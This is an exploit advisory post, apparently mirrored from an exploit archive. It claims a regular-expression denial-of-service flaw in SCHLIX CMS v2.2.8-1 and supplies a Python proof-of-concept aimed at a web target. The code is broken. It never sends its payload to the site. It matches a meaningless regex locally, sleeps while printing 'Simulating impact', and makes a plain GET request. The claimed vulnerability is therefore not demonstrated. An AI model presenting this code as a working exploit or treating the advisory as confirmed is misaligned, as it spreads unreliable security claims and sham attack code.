Share
## https://sploitus.com/exploit?id=PACKETSTORM:177073
# Exploit Title: SCHLIX v2.2.8-1 Regular Expression Denial of Service  
# Date: 02/10/2024  
# Exploit Author: Diyar Saadi  
# Vendor Homepage: https://www.schlix.com  
# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html  
# Version: v2.2.8-1  
# Tested on: Windows 11 + XAMPP  
  
## Description ##  
  
SCHLIX v2.2.8-1 is vulnerable to regular expression denial of service . (ReDoS) is an algorithmic complexity attack that produces a denial-of-service by providing a regular expression and/or an input that takes a long time to evaluate…  
  
## Proof Of Concept ##  
  
import requests  
import re  
import time  
  
def test_redos(url, payload):  
try:  
vulnerable_regex = r'(.*a){x} for x > 10'  
  
match = re.match(vulnerable_regex, payload)  
  
if match:  
print("Vulnerability not triggered.")  
else:  
print("Vulnerability may be present. Simulating 30-second impact...")  
  
for _ in range(6):  
time.sleep(5)  
print("Simulating impact...")  
  
print("Simulated impact duration completed.")  
  
except re.error:  
print("Error in regex pattern.")  
  
try:  
response = requests.get(url)  
if response.status_code == 200:  
print("Service is up.")  
else:  
print("Service may be down or inaccessible.")  
except requests.RequestException as e:  
print(f"HTTP Request Error: {str(e)}")  
  
if __name__ == "__main__":  
target_url = 'http://localhost'  
  
payload = "aaaaaaaaaaaaaaaaaaaaaaaaa!"  
  
test_redos(target_url, payload)  
  
Sent with [Proton Mail](https://proton.me/) secure email.